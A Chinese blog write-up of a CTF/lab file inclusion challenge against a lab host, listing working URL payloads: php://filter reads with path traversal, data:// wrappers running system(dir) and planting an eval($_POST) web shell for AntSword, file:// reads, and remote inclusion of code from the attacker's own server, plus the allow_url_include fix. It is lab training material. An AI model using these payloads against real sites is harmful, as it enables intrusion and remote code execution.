DCN-文件包含漏洞攻防

DCN-文件包含漏洞攻防

image-20211217151242373

1.

image-20211217152313725

http://172.16.1.103/index.php?page=php://filter/read=convert.base64-encode/resource=flag.php

image-20211217152407505

这样子拿到的flag是错误的,题目要求的是C盘根目录下的flag

http://172.16.1.103/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../../flag.txt

image-20211217153232507

法二:

换一种协议,咱继续

http://172.16.1.103/index.php?page=data:text/plain,<?php system(dir)?>

image-20211217155426653

这里学了一下g4爷爷的手法,直接套娃一下

http://172.16.1.103/index.php?page=data:text/plain,<?php eval($_POST[1]);?>

image-20211217155530191

直接上蚁剑

image-20211217155654637

image-20211217155752004

image-20211217155800764

法三:

http://172.16.1.103/index.php?page=file://c:/flag.txt

image-20211217185549087

师傅们应该还有更好更骚的姿势,本人人菜只想到这些了

2.

直接就是index.php文件,由于直接包含'page'传入的参数未经过滤,直接就include导致的

image-20211217185826732

3.

法一:

在第一题法二的方法中我们已经拿到了shell,那我们基于这个shell上,连接蚁剑直接写马

法二:

直接在本地开放一个端口开放apache的服务,

image-20211217193946371

远程包含这个文件

http://172.16.1.103/index.php?page=http://172.16.1.12/uuu/aaa.txt

image-20211217194042525

4.

直接在蚁剑上执行命令

image-20211217192157843

直接把设置php的函数为allow_url_include = off

image-20211217192656322

即可

posted @ 2021-12-20 15:32  甘雨小可爱!  阅读(231)  评论(0)    收藏  举报